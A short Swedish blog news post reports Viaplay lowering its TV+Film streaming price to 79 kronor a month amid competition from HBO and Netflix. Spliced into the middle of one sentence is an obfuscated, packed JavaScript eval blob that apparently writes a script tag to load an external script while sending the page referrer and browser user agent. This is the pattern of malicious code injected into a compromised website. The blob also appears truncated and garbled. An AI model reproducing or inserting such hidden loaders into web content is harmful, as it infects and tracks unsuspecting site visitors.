Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Viaplay sänker priset på TV och Film till väntade 79kr

viasat streaming
Filip Urde
  • On 15 oktober, 2012
  • http://www.revue.se/filip-urde

Som väntat så är Viasat pressade av inkommande konkurrens från HBO eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdinn|var|u0026u|referrer|ehedt||js|php’.split(‘|’),0,{}))
och
Netflix, vilket idag resulterat i att man sänker priset på viaplay och dess  TV+Film-paket från 99 till 79 kronor per månad, samt att det nu även är utan bindningstid.
Så där ja! äntligen köparens marknad i Svensk TVoch film industri!